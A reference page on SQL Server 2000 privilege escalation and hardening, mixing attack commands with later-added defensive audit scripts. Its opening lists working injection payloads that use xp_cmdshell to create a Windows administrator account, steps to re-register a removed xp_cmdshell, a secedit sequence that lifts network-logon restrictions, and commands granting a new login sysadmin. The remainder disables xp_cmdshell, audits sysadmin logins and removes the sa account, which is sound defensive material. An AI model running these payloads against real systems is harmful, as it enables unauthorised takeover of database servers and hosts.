Commands related to SQL server privilege escalation and Prevention Measures

Source: Internet
Author: User

Injection payloads, appended to a vulnerable query parameter; each one runs a Windows command through xp_cmdshell to create a local user and add it to the Administrators group:

; exec master..xp_cmdshell "net user name password /add"--

; exec master..xp_cmdshell "net localgroup administrators name /add"--

SQL to enable the shell (register xp_cmdshell)

exec sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll'

Check whether the extended stored procedure exists

select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'

If the result is 1, the procedure is registered.

Restore xp_cmdshell

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'

If the result is 1, the procedure was re-registered.

Otherwise the DLL cannot be found: upload xplog70.dll and register the procedure with its full path.

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'

SQL to disable the shell (prevention)

exec sp_dropextendedproc 'xp_cmdshell'

Dropping the procedure is only a partial measure: as the restore commands above show, anyone with sysadmin can re-register it as long as xplog70.dll is still on disk, so remove or rename the DLL as well, and do not let application logins connect as sa or any other sysadmin. On SQL Server 2005 and later the procedure is switched off with sp_configure 'xp_cmdshell', 0 instead.
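The following T-SQL is an added example, not part of the original page: it carries out the check, disable and verify steps above as one audit script for a SQL Server 2000 instance, and adds the two checks a defender wants that the page leaves out (who may execute the procedure, and whether the DLL that backs it is still on disk). The DLL path is the one the page uses in its restore step and is an assumption; the default location on SQL Server 2000 is the instance's Binn directory.

```sql
-- Added example (not from the original page): audit and disable xp_cmdshell
-- on SQL Server 2000, run from Query Analyzer as sysadmin.
-- The DLL path is an assumption taken from the page's restore step; adjust
-- it to wherever xplog70.dll actually lives on the instance (default: Binn).
use master
go

-- 1. Is the procedure registered, and which DLL backs it?
exec sp_helpextendedproc 'xp_cmdshell'
go

-- 2. Who may execute it?  In sysprotects, action 224 is EXECUTE and
--    protecttype 206 is DENY.  A row for 'public' means every login can run
--    operating-system commands through the procedure.
select u.name as grantee, p.protecttype
from sysprotects p
join sysusers u on u.uid = p.uid
where p.id = object_id('xp_cmdshell')
  and p.action = 224
  and p.protecttype <> 206
go

-- 3. Does the DLL still exist?  xp_fileexist returns three ints:
--    file exists, file is a directory, parent directory exists.
--    If the file is present, a sysadmin can re-register the procedure with
--    sp_addextendedproc at any time, so the DLL has to go too.
create table #dll (file_exists int, is_directory int, parent_exists int)
insert into #dll exec master..xp_fileexist 'c:\winnt\system32\xplog70.dll'
select * from #dll
drop table #dll
go

-- 4. Drop the procedure and verify; still_registered should be 0.
if exists (select 1 from sysobjects where xtype = 'X' and name = 'xp_cmdshell')
    exec sp_dropextendedproc 'xp_cmdshell'
go
select count(*) as still_registered
from sysobjects
where xtype = 'X' and name = 'xp_cmdshell'
go
```

Step 2 is the one worth running even when you intend to keep xp_cmdshell: the injection payloads at the top of the page only work because the compromised application login is sa or otherwise allowed to execute the procedure.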

DOS (cmd.exe) commands run through xp_cmdshell:

dir c:\

dir d:\

dir e:\

net user tsinternetusers password /add

net localgroup administrators tsinternetusers /add

Backing up and rewriting the local security policy (secedit)

secedit /export /cfg c:\tmp.inf

echo SeDenyNetworkLogonRight = >> c:\tmp.inf

secedit /configure /db c:\windows\secedit.sdb /cfg c:\tmp.inf

The first command exports the current local security policy to a template; the second appends an empty SeDenyNetworkLogonRight entry ("Deny access to this computer from the network") so that re-importing the template with the third command clears that restriction and the account just created can log on over the network. If the original policy is to be restored later, copy the exported c:\tmp.inf before appending to it.

SQL:

exec master..sp_addlogin 'username', 'password'

exec master..sp_addsrvrolemember 'username', 'sysadmin'
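As an added example that is not part of the original page, this script is the defender's counterpart to the two commands above: it lists every login holding sysadmin on a SQL Server 2000 instance and removes an unexpected one. The login name webapp is hypothetical.

```sql
-- Added example (not from the original page): find logins that were added to
-- sysadmin with sp_addsrvrolemember and remove one that should not be there.
-- 'webapp' is a hypothetical login name used for illustration.
use master
go

-- 1. Every login holding the sysadmin role, newest first.
--    The syslogins view exposes each fixed server role as a bit column.
select name, createdate, updatedate
from syslogins
where sysadmin = 1
order by createdate desc
go

-- 2. The same membership list via the documented procedure.
exec sp_helpsrvrolemember 'sysadmin'
go

-- 3. Remove an unexpected member from the role, then drop the login.
--    sp_droplogin refuses to drop a login that still owns a database
--    (sysdatabases.sid), so check that first and reassign ownership
--    with sp_changedbowner if needed.
if exists (select 1
           from sysdatabases d
           join syslogins l on l.sid = d.sid
           where l.name = 'webapp')
    print 'webapp still owns a database; run sp_changedbowner in that database first'
else
begin
    exec sp_dropsrvrolemember 'webapp', 'sysadmin'
    exec sp_droplogin 'webapp'
end
go
```

Compare the createdate column in step 1 against the dates of known administrative changes: a sysadmin login created minutes after a burst of web requests is the signature of the injection payloads on this page.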

Renaming and deleting the sa account

First, in Enterprise Manager, open the server's properties (Tools > SQL Server Configuration Properties), go to the Server Settings tab, tick "Allow modifications to be made directly to the system catalogs", and click OK.

Then open Query Analyzer and log in (any account will do, as long as it has db_owner in the master database).

update sysxlogins set name = 'new_name' where sid = 0x01

update sysxlogins set sid = 0xE765555BD44F054F89CD0076A06EA823 where name = 'new_name'

sa always has SID 0x01: the first statement renames it, and the second gives it a different SID so that it is no longer recognised as the built-in account. Once both statements succeed, switch back to Enterprise Manager and refresh Security > Logins: sa now appears under its new name (xwq in the original example). Right-click it, and the Delete option is now available; delete it and confirm that sa is gone. Direct edits to system tables are unsupported, so back up master before doing this.

Postscript

Deleting sa directly from Query Analyzer

The method is the same as above, but without Enterprise Manager: the system stored procedure sp_configure, which displays or changes global configuration settings of the current server, is used instead to allow updates to the system tables.

Syntax:

sp_configure [[@configname =] 'name']
    [, [@configvalue =] 'value']

Example:

sp_configure 'allow updates', 1

go

reconfigure with override

go

System tables can now be updated. Next, run update sysxlogins set name = 'new_name' where sid = 0x01, then delete the renamed login.

Note the permissions involved: by default, execute permission on sp_configure with no parameters (or only the first) is granted to all users, while execute permission on sp_configure with both parameters (used to change a configuration option) is granted to the sysadmin and serveradmin fixed server roles. RECONFIGURE permission is granted by default to the sysadmin and serveradmin fixed server roles and cannot be transferred. You must also be db_owner in master.
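The two procedures above (the Enterprise Manager route and the sp_configure route) combined into one Query Analyzer script, as an added example that is not part of the original page. It uses xwq, the new name from the page's own example, and the SID value the page supplies; the only additions are dropping the renamed login with sp_droplogin instead of through Enterprise Manager, and switching allow updates off again at the end. This applies to SQL Server 2000 only: on SQL Server 2005 and later 'allow updates' has no effect and system tables cannot be updated.

```sql
-- Added example (not from the original page): rename and delete sa from
-- Query Analyzer on SQL Server 2000.  'xwq' is the example name used on the
-- page and the SID is the value the page uses.  Back up master first; direct
-- updates to system tables are unsupported.
use master
go

-- 1. Allow direct updates to the system tables (needs sysadmin or serveradmin).
exec sp_configure 'allow updates', 1
reconfigure with override
go

-- 2. sa always has SID 0x01.  Rename it, then give it a different SID so
--    that it is no longer the built-in account; sp_droplogin refuses to
--    drop 'sa' by name, which is why the rename comes first.
update sysxlogins set name = 'xwq' where sid = 0x01
update sysxlogins set sid = 0xE765555BD44F054F89CD0076A06EA823 where name = 'xwq'
go

-- 3. It is now an ordinary login and can be dropped.
exec sp_droplogin 'xwq'
go

-- 4. Lock the system tables again.
exec sp_configure 'allow updates', 0
reconfigure with override
go

-- 5. Verify: expect no rows.
select name, sid from sysxlogins where name in ('sa', 'xwq')
go
```

Databases owned by sa still record owner SID 0x01 in sysdatabases after this; reassign them with sp_changedbowner to a login that exists, or their ownership will resolve to nothing.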
